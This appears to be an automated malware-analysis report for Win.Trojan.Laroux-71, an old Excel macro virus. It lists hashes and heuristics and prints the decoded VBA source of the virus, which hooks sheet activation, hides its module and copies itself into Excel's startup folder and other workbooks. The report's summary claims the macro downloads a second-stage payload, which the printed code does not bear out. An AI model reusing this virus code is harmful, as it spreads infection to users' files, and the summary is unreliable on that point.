Win.Trojan.Laroux-71 — Office (OLE) malware analysis

Static analysis result for SHA-256 68ee1de0931ce38e…

MALICIOUS

Office (OLE)

33.0 KB Created: 1998-11-07 01:35:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 32f204240fca11604a87819fef084cb5 SHA-1: 71ed984e258554ce3fcd0b48cf7a2a807d5bdc3f SHA-256: 68ee1de0931ce38e1c22903b89b0f5c4931c87099c831b4c883103b8dbf44448
180 Risk Score

Malware Insights

Win.Trojan.Laroux-71 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5 macro virus, specifically Win.Trojan.Laroux-71. The auto_open macro is designed to execute automatically when the document is opened, attempting to download and execute a second-stage payload named 'virmod.xls'. This indicates a classic macro-based malware delivery mechanism.

Heuristics 4

  • ClamAV: Win.Trojan.Laroux-71 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Laroux-71
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10326 bytes
SHA-256: c55f6ff47f4fc3fc70ef8a8317928ca46572476309e3375418f2db10a95b96db
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "forecastmod"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Randomize Timer
    On Error Resume Next
    If Application.Workbooks.Count = 1 And ActiveWorkbook.Worksheets.Count = 0 Then Application.Workbooks.Add
    Application.OnSheetActivate = "forecast"
End Sub

Sub Forecast()
Attribute Forecast.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = False
    If StrComp(Dir(Application.StartupPath & "\" & "virmod.xls"), "virmod.xls", 1) = 0 Then
        ck_txtfile
        t$ = "virmod"
        s$ = get_txtfile(get_parent_of_start & "\", t$)
        If ActiveWorkbook.Modules.Count = 0 Then
            activewbn$ = ActiveWorkbook.Name
            activeshn$ = ActiveSheet.Name
            If (StrComp(Workbooks(activewbn$).Sheets(1).Name, "forecastmod", 1) <> 0) And (StrComp(Dir(s$), t$, 1) = 0) Then
                ActiveWorkbook.Modules.Add before:=Workbooks(activewbn$).Sheets(1)
                With ActiveWorkbook.Modules(1)
                    .Name = "forecastmod"
                    .InsertFile s$, True
                    .Visible = False
                End With
                Workbooks(activewbn$).Worksheets(activeshn$).Activate
            End If
        End If
    Else
        start$ = Application.StartupPath
        If ActiveWorkbook.Modules.Count = 1 Then
            s$ = Application.StartupPath & "/" & "virmod.xls"
            cname$ = ActiveWorkbook.Name
            With Sheets("forecastmod")
                .Visible = True
                .Select
                .Copy
            End With
            With ActiveWorkbook
                .Title = ""
                .Subject = ""
                .Author = ""
                .Keywords = ""
                .Comments = ""
            End With
            activewbn$ = ActiveWorkbook.Name
            cwd$ = CurDir()
            ChDir Application.StartupPath
            ActiveWindow.Visible = False
            Workbooks(activewbn$).SaveAs Filename:=s$, FileFormat:=xlNormal, password:="", writeResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
            ChDir cwd$
            Workbooks(cname$).Sheets("forecastmod").Visible = False
        End If
    End If
    With Application
        .ScreenUpdating = True
        .OnSheetActivate = "virmod.xls!forecast"
    End With
End Sub

Sub ck_txtfile()
Attribute ck_txtfile.VB_ProcData.VB_Invoke_Func = " \n14"
    t$ = "virmod"
    s$ = get_txtfile(get_parent_of_start & "\", t$)
    If StrComp(Dir(s$), t$, 1) <> 0 Then
        Workbooks("virmod.xls").Sheets("forecastmod").SaveAs Filename:=s$, FileFormat:=xlText, CreateBackup:=False
    End If
End Sub

Function get_txtfile(s$, t$)
Attribute get_txtfile.VB_ProcData.VB_Invoke_Func = " \n14"
    r$ = Right$("00" & CStr(Rnd() * 100), 2)
    t$ = t$ & r$ & ".txt"
    get_txtfile = s$ & t$
End Function

Function get_parent_of_start()
Attribute get_parent_of_start.VB_ProcData.VB_Invoke_Func = " \n14"
    p$ = Application.StartupPath
    m = 0
    n = InStr(1, p$, "\", 1)
    While n > 0 And n < Len(p$)
        m = n
        n = InStr(m + 1, p$, "\", 1)
    Wend
    If m > 1 Then
        get_parent_of_start = Left$(p$, m - 1)
    Else
        get_parent_of_start = ""
    End If
End Function








' Processing file: /opt/analyzer/scan_staging/4741b67e8f2c437ba586fc14aea2ba6b.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/forecastmod - 5078 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub auto_open())
' Line #2:
' 	Ld Timer 
' 	ArgsCall Read 0x0001 
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	Ld Application 
' 	MemLd Workbooks 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Eq 
' 	Ld ActiveWorkbook 
' 	MemLd Worksheets 
' 	MemLd Count 
' 	LitDI2 0x0000 
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	Ld Application 
' 	MemLd Workbooks 
' 	ArgsMemCall Add 0x0000 
' 	EndIf 
' Line #5:
' 	LitStr 0x0008 "fo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.